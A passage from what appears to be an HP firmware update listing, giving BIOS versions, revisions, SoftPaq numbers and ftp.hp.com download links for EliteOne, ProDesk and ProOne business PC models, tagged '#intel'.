
https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139797.exe

HP EliteOne 800 G4 23.8-in Healthcare Edition All-in-One Business PC

BIOS

02.18.00

Rev 1

SP137015

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137015.exe

HP EliteOne 800 G4 23.8-inch Non-Touch All-in-One PC

BIOS

02.18.00

Rev 1

SP137015

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137015.exe

HP EliteOne 800 G4 23.8-inch Non-Touch GPU All-in-One PC

BIOS

02.18.00

Rev 1

SP137015

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137015.exe

HP EliteOne 800 G4 23.8-inch Touch All-in-One PC

BIOS

02.18.00

Rev 1

SP137015

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137015.exe

HP EliteOne 800 G4 23.8-inch Touch GPU All-in-One PC

BIOS

02.18.00

Rev 1

SP137015

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137015.exe

HP EliteOne 800 G5 23.8-in Healthcare Edition All-in-One

BIOS

2.11.01

Rev 1

SP136705

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136705.exe

HP EliteOne 800 G5 23.8-inch All-in-One

BIOS

2.11.01

Rev 1

SP136705

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136705.exe

HP ProDesk 400 G3 Desktop Mini PC

BIOS

02.40

Rev 3

SP139783

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139783.exe

HP ProDesk 400 G4 Desktop Mini PC

BIOS

02.18.00

Rev 1

SP136964

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136964.exe

HP ProDesk 400 G4 Microtower PC

BIOS

02.40

Rev 1

SP139854

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139854.exe

HP ProDesk 400 G4 Small Form Factor PC

BIOS

02.40

Rev 1

SP139796

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139796.exe

HP ProDesk 400 G5 Desktop Mini PC

BIOS

02.11.00

Rev 1

SP136574

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136574.exe

HP ProDesk 400 G5 Microtower PC

BIOS

02.17.00

Rev 1

SP136497

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136497.exe

HP ProDesk 400 G5 Small Form Factor PC

BIOS

2.17

Rev 1

SP136532

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136532.exe

HP ProDesk 400 G6 Microtower PC

BIOS

02.11.00

Rev 1

SP136501

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136501.exe

HP ProDesk 400 G6 Small Form Factor PC

BIOS

02.11.00

Rev 1

SP136515

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136515.exe

HP ProDesk 405 G4 Desktop Mini PC

BIOS

02.17.00

Rev 1

SP136824

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136824.exe

HP ProDesk 405 G4 Small Form Factor PC

BIOS

02.12.00

Rev 1

SP137069

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137069.exe

HP ProDesk 480 G4 Microtower PC

BIOS

02.40

Rev 1

SP139854

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139854.exe

HP ProDesk 480 G5 Microtower PC

BIOS

02.17.00

Rev 1

SP136497

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136497.exe

HP ProDesk 480 G6 Microtower PC

BIOS

02.11.00

Rev 1

SP136501

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136501.exe

HP ProDesk 600 G3 Desktop Mini PC

BIOS

02.40

Rev 3

SP139782

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139782.exe

HP ProDesk 600 G3 Microtower PC

BIOS

02.40

Rev 1

SP139853

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139853.exe

HP ProDesk 600 G3 Small Form Factor PC

BIOS

02.40

Rev 1

SP139795

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139795.exe

HP ProDesk 600 G4 Desktop Mini PC

BIOS

02.18.00

Rev 1

SP136957

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136957.exe

HP ProDesk 600 G4 Microtower PC

BIOS

02.17.00

Rev 1

SP136496

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136496.exe

HP ProDesk 600 G4 Microtower PC (with PCI slot)

BIOS

02.17.00

Rev 1

SP136496

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136496.exe

HP ProDesk 600 G4 Small Form Factor PC

BIOS

02.18.00

Rev 1

SP136961

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136961.exe

HP ProDesk 600 G5 Desktop Mini PC

BIOS

02.11.00

Rev 1

SP136573

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136573.exe

HP ProDesk 600 G5 Microtower PC

BIOS

02.11.00

Rev 1

SP136500

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136500.exe

HP ProDesk 600 G5 Microtower PC (with PCI slot)

BIOS

02.11.00

Rev 1

SP136500

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136500.exe

HP ProDesk 600 G5 Small Form Factor PC

BIOS

02.11.00

Rev 1

SP136514

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136514.exe

HP ProDesk 680 G3 Microtower PC

BIOS

02.40

Rev 1

SP139853

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139853.exe

HP ProDesk 680 G4 Microtower PC

BIOS

02.17.00

Rev 1

SP136496

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136496.exe

HP ProDesk 680 G4 Microtower PC (With PCI slot)

BIOS

02.17.00

Rev 1

SP136498

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136498.exe

HP ProOne 400 G3 20-inch Non-Touch All-in-One PC

BIOS

02.40

Rev 3

SP140061

https://ftp.hp.com/pub/softpaq/sp140001-140500/sp140061.exe

HP ProOne 400 G3 20-inch Touch All-in-One PC

BIOS

02.40

Rev 3

SP140061

https://ftp.hp.com/pub/softpaq/sp140001-140500/sp140061.exe

HP ProOne 400 G4 20-inch Non-Touch All-in-One Business PC

BIOS

02.17.00

Rev 1

SP136516

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136516.exe

HP ProOne 400 G4 23.8-inch Non-Touch All-in-One Business PC

BIOS

02.17.00

Rev 1

SP136516

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136516.exe

HP ProOne 400 G5 20-inch All-in-One Business PC

BIOS

02.11.01

Rev 1

SP136660

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136660.exe

HP ProOne 400 G5 23.8-inch All-in-One Business PC

BIOS

02.11.01

Rev 1

SP136660

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136660.exe

HP ProOne 440 G4 23.8-inch Non-Touch All-in-One Business PC

BIOS

02.17.00

Rev 1

SP136516

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136516.exe

HP ProOne 440 G5 23.8-in All-in-One Business PC

BIOS

02.11.01

Rev 1

SP136660

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136660.exe

HP ProOne 480 G3 20-inch Non-Touch All-in One PC

BIOS

02.40

Rev 3

SP140061

https://ftp.hp.com/pub/softpaq/sp140001-140500/sp140061.exe

HP ProOne 600 G3 21.5-inch Non-Touch All-in-One PC

BIOS

02.40

Rev 3

SP140060

https://ftp.hp.com/pub/softpaq/sp140001-140500/sp140060.exe

HP ProOne 600 G4 21.5-inch Touch All-in-One Business PC

BIOS

02.17.00

Rev 1

SP136516

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136516.exe

HP ProOne 600 G5 21.5-in All-in-One Business PC

BIOS

02.11.01

Rev 1

SP136660

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136660.exe

Tag

#intel